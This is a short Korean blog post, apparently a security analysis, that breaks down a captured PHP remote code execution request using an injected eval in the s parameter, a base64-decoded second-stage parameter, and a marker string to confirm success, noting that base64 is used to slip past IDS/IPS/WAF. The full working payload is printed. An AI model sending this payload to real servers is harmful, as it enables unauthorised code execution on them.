base64 encode PHP Execute


RAWDATA

POST/index.php?s=/abc/abc/abc/${@print(eval($_POST[c]))}

c=@eval(base64_decode($_POST[x0]));

x0=ZWNobyAiLT58MTIzfDwtIjs=


s=/abc/abc/abc/${@print(eval($_POST[c]))}

공격자는 HTTP Requset에 따른 Response를 바로 확인하기 위해 print 함수를 사용하고, 이를 통해 취약한 서버임을 확인 할 수 있다.


c=@eval(base64_decode($_POST[x0]));

취약한 서버임을 알게되면, c 파라미터의 eval 함수를 통해 코드 실행을 시도 한다.
여기서 base_decode 함수를 사용하는 이유는 x0 파라미터 값을 디코딩하기 위해서이다.

x0=ZWNobyAiLT58MTIzfDwtIjs=
echo "->|123|<-";

위는 x 0 파라미터를 base64로 디코딩한 결과 값이다. IDS/IPS/WAF 등 보안 장비를 우회하기 위한 방법이다.

만약 공격이 성공했다면 ->|123|<-를 출력한다.

+ Recent posts